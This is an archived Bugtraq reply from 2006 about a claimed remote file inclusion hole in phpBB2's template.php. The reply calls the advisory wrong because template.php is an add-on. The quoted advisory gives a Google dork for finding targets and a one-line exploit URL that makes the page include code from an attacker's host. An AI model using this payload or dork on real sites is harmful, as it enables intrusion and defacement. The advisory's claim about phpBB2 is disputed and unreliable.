Bugtraq: Re: phpBB2 (template.php) Remote File Inclusion

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: phpBB2 (template.php) Remote File Inclusion

From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Mon, 05 Jun 2006 12:14:46 +0200

template.php is an addon and not part of phpbb2, noobs....


canberx () linuxmail org wrote:

********************************************************************

*Title:

*phpBB2 Remote File Include

*

*

*Credit:

*Canberx

*

*

*Thanx:

*Forewer-Partizan

*

*

*Mail:

*canberx () linuxmail org    www.canberx.tk

*

*

*Google Dork:

*Powered by phpBB © 2001, 2002 phpBB Group

*

*

*Exploit:

*www.target.com/[path_to_phpbb]/template.php?page=[attacker]

*

*

*********************************************************************


Plz Don't Hacked site if it already has been defaced :)


*********************************************************************


__________ NOD32 1.1578 (20060604) Information __________

This message was checked by NOD32 antivirus system.
http://www.eset.com

Attachment: ad.vcf
Description:

By Date By Thread

Current thread:

phpBB2 (template.php) Remote File Inclusion canberx (Jun 04)
- RE: phpBB2 (template.php) Remote File Inclusion Scrouaf _ (Jun 05)
- Re: phpBB2 (template.php) Remote File Inclusion ad () heapoverflow com (Jun 05)
  - Re: phpBB2 (template.php) Remote File Inclusion Jessica Hope (Jun 06)
  - Re: phpBB2 (template.php) Remote File Inclusion Aaron Klein (Jun 06)
  - Re: phpBB2 (template.php) Remote File Inclusion Paul Laudanski (Jun 06)